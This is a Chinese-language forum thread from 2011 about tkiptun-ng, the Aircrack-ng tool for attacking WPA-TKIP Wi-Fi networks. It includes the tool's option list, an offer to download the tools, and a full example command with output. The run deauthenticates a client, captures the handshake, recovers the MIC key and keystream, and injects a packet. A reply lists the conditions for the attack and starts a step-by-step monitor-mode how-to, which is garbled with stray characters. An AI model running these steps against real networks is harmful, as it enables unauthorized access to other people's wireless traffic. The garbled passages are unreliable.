Aircrack-ng里的WPA-TKIP终结工具的使用说明(wpa已经被攻破)
本帖最后由 dangdidiqq 于 2011-5-24 23:28 编辑使用方法: tkiptun-ng <options> <replay interface>
过滤选项: [*]-d dmac : MAC address, 目的地址[*]-s smac : MAC address, 源地址[*]-m len : minimum packet length[*]-n len : maximum packet length[*]-t tods : frame control, To DS bit[*]-f fromds : frame control, From DS bit[*]-D : disable AP detection
Replay 攻击选项: [*]-x nbpps : number of packets per second[*]-a bssid : set Access Point MAC address[*]-c dmac : set Destination MAC address[*]-h smac : set Source MAC address[*]-F : choose first matching packet[*]-e essid : set target AP SSID
Debug options: [*]-K prga : keystream for continuation[*]-y file : keystream-file for continuation[*]-j : inject FromDS packets[*]-P pmk : pmk for verification/vuln testing[*]-p psk : psk to calculate pmk with essid
Source options: [*]-i iface : capture packets from this interface[*]-r file : extract packets from this pcap file
[*]--help : Displays this usage screen
此工具名称为 tkiptun-ng,在aircrack-ng 1.0 rc2 第一次添加,当时不够完善,并没有能起到作用。
此工具PJ针对 wpa tkip加密,并且路由器开启qos(带宽限制,流量控制,协议控制等,老路由器不支持此功能)
相信有点基础的都看的懂,我没有使用过,因为我这里没有这种ap。
附加完整工具下载,论坛上有人发过for linux版本,我这里再补上for windows版本
windows版本里工具已经非常齐全,包括监听攻击PJ,和linux里的一样一样的,可以缺少了最关键的“驱动”,我把这个提出来,希望有人能把驱动开发出来,这样就不用两个系统转换那么麻烦了。
本帖隐藏的内容需要回复才可以浏览
感谢楼主的分享,好东西!!!! Input: 输入
tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0
Output: 输出
The interface MAC (00:0E:2E:C5:81:D3) doesn't match the specified MAC (-h).
ifconfig rausb0 hw ether 00:0F:B5:AB:CB:9D
Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
15:06:48Michael Test: Successful
15:06:48Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
15:06:48Found specified AP
15:06:48Sending 4 directed DeAuth. STMAC: [ 0| 0 ACKs]
15:06:54Sending 4 directed DeAuth. STMAC: [ 0| 0 ACKs]
15:06:56WPA handshake: 00:14:6C:7E:40:80 captured
15:06:56Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-0305-150705.cap
15:07:05Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-0305-150705.cap
15:07:05Got the answer!
15:07:05Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.
15:07:25Offset 99 ( 0% done) | xor = B3 | pt = D3 |103 frames written in 84468ms
15:08:32Offset 98 ( 1% done) | xor = AE | pt = 80 | 64 frames written in 52489ms
15:09:45Offset 97 ( 3% done) | xor = DE | pt = C8 |131 frames written in 107407ms
15:11:05Offset 96 ( 5% done) | xor = 5A | pt = 7A |191 frames written in 156619ms
15:12:07Offset 95 ( 6% done) | xor = 27 | pt = 02 | 21 frames written in 17221ms
15:13:11Offset 94 ( 8% done) | xor = D8 | pt = AB | 41 frames written in 33625ms
15:14:12Offset 93 (10% done) | xor = 94 | pt = 62 | 13 frames written in 10666ms
15:15:24Offset 92 (11% done) | xor = DF | pt = 68 |112 frames written in 91829ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:18:13Offset 91 (13% done) | xor = A1 | pt = E1 |477 frames written in 391139ms
15:19:32Offset 90 (15% done) | xor = 5F | pt = B2 |186 frames written in 152520ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:22:09Offset 89 (16% done) | xor = 9C | pt = 77 |360 frames written in 295200ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:26:10Offset 88 (18% done) | xor = 0D | pt = 3E |598 frames written in 490361ms
15:27:33Offset 87 (20% done) | xor = 8C | pt = 00 |230 frames written in 188603ms
15:28:38Offset 86 (21% done) | xor = 67 | pt = 00 | 47 frames written in 38537ms
15:29:53Offset 85 (23% done) | xor = AD | pt = 00 |146 frames written in 119720ms
15:31:16Offset 84 (25% done) | xor = A3 | pt = 00 |220 frames written in 180401ms
15:32:23Offset 83 (26% done) | xor = 28 | pt = 00 | 75 frames written in 61499ms
15:33:38Offset 82 (28% done) | xor = 7C | pt = 00 |141 frames written in 115619ms
15:34:40Offset 81 (30% done) | xor = 02 | pt = 00 | 19 frames written in 15584ms
15:35:57Offset 80 (31% done) | xor = C9 | pt = 00 |171 frames written in 140221ms
15:37:13Offset 79 (33% done) | xor = 38 | pt = 00 |148 frames written in 121364ms
15:38:21Offset 78 (35% done) | xor = 71 | pt = 00 | 84 frames written in 68872ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:40:55Offset 77 (36% done) | xor = 8E | pt = 00 |328 frames written in 268974ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:43:31Offset 76 (38% done) | xor = 38 | pt = 00 |355 frames written in 291086ms
15:44:37Offset 75 (40% done) | xor = 79 | pt = 00 | 61 frames written in 50021ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:47:05Offset 74 (41% done) | xor = 59 | pt = 00 |269 frames written in 220581ms
15:48:30Offset 73 (43% done) | xor = 14 | pt = 00 |249 frames written in 204178ms
15:49:49Offset 72 (45% done) | xor = 9A | pt = 00 |183 frames written in 150059ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:52:32Offset 71 (46% done) | xor = 03 | pt = 00 |420 frames written in 344400ms
15:53:57Offset 70 (48% done) | xor = 0E | pt = 00 |239 frames written in 195980ms
Sleeping for 60 seconds.36 bytes still unknown
ARP Reply
Checking 192.168.x.y
15:54:11Reversed MIC Key (FromDS): C3:95:10:04:8F:8D:6C:66
Saving plaintext in replay_dec-0305-155411.cap
Saving keystream in replay_dec-0305-155411.xor
15:54:11
Completed in 2816s (0.02 bytes/s)
15:54:11AP MAC: 00:40:F4:77:F0:9B IP: 192.168.21.42
15:54:11Client MAC: 00:0F:B5:AB:CB:9D IP: 192.168.21.112
15:54:11Sent encrypted tkip ARP request to the client.
15:54:11Wait for the mic countermeasure timeout of 60 seconds. 好帖,可以破WPA 首先要具备3点必备的攻击条件
1 客户端和接入点必须使用WPA TKIP 而且客户端必须连接
2 客户端和接入点必须使用的网络协议地址的IPv4,z!z%[�p(}bIb
3一个长期存在的时间延长键(重新输入间隔)必须设定的接入点。在大多数调制解调器/无线路由器使用TKIP ,这一时期是默认情况下设置为3600秒,从而使攻击(U)TI8B\;Ow&H+a;q
以上3点基本上是没有问题了下面是就是攻击了4l?)S%L*ITUU
airmon-ng a 首先把网卡监视模式打开:输入airmon-ng start wlan0 注意我的网卡端口是wlan0不同的网卡端口都不一样可以用ifconfig -a 进行查看(E$b8c0}/F`$d
输入后出现的内如如下
PID Name
2954 dhcpcd
2uDm;J0g@
Interface Chipset Driver-p#}3W K7X"aPGo
f.lh qt|B
wlan0 RTL8187 r8187 (monitor mode enabled) 实际PJwpa加密的很简单 怎么都是乱码你从哪里复制过来的 {:3_62:}................................... 我顶上去。。。 我跳水,扑通,扑通 想学习用这个,可也太贵了吧 额 学习一下。。。 不能沉不能沉